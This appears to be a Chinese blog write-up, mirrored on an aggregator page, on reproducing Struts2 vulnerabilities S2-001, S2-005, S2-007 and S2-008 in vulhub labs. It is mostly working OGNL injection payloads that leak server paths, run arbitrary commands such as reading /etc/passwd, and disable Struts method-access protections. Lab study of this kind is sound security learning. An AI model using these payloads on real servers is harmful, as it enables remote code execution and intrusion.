码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • struts2漏洞复现


    目录

    vulhub/struts2/s2-001

    1.获取tomcat执行路径:

    2.获取Web路径:

    3.执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}):

    vulhub/struts2/s2-005

    vulhub/struts2/s2-007

    vulhub/struts2/s2-008


    vulhub/struts2/s2-001

    strust2

    框架特征:文件后缀名为.action/.do

    s2-001

    漏洞原理:由于用户表单提交的数据验证失败时,后端会将用户提交的参数值使用OGNL表达式进行解析,解析完之后重新填充到表单数据中

    1.获取tomcat执行路径:

    %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

    tomcatBinDir{/usr/local/tomcat}

    2.获取Web路径:

    %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

     

     

    al/tomcat/webapps/ROOT/

    3.执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}):

    %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

     

    %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

     

    /usr/local/tomcat

    vulhub/struts2/s2-005

    XWork 将使用 OGNL 表达式将 GET 参数的键和值解析为 Java 语句

    \u0023#  (unicode编码 \u)

     

     

    vulhub/struts2/s2-007

    配置验证规则时。如果类型验证转换失败,服务器将拼接用户提交的表单值字符串,然后执行 OGNL 表达式解析并返回

     

    ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

    vulhub/struts2/s2-008

    ?debug=command&expression=%28%23application%29

     

  • 相关阅读:
    学习数据结构和算法的第8天
    k8s集群证书过期解决
    【数据结构】线性表
    优维产品使用最佳实践:实例拓扑
    JVM学习笔记——内存结构篇
    “华为杯”研究生数学建模竞赛2015年-【华为杯】E题:数控加工刀具运动的优化控制模型研究(附MATLAB代码实现)
    【华为OD机试python】分割数组的最大差值【2023 B卷|100分】
    深入理解计算机系统,汇编的流程控制
    3D-SKIPDENSESEG医学图像分割
    47.各种类型的线程池
  • 原文地址:https://blog.csdn.net/m0_63127854/article/details/125438318
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号